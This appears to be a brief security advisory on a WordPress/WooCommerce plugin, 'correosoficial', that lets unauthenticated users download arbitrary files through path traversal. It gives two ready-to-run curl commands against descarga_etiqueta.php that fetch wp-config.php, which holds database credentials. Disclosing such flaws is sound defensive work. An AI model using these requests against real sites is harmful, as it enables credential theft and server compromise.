The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.
Dependency: WooCommerce plugin Use the following curl command to download the contents of the wp-config.php file: curl -i ‘https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename;=wp-config.php’ or curl -i ‘https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename;=/../../wp-config.php’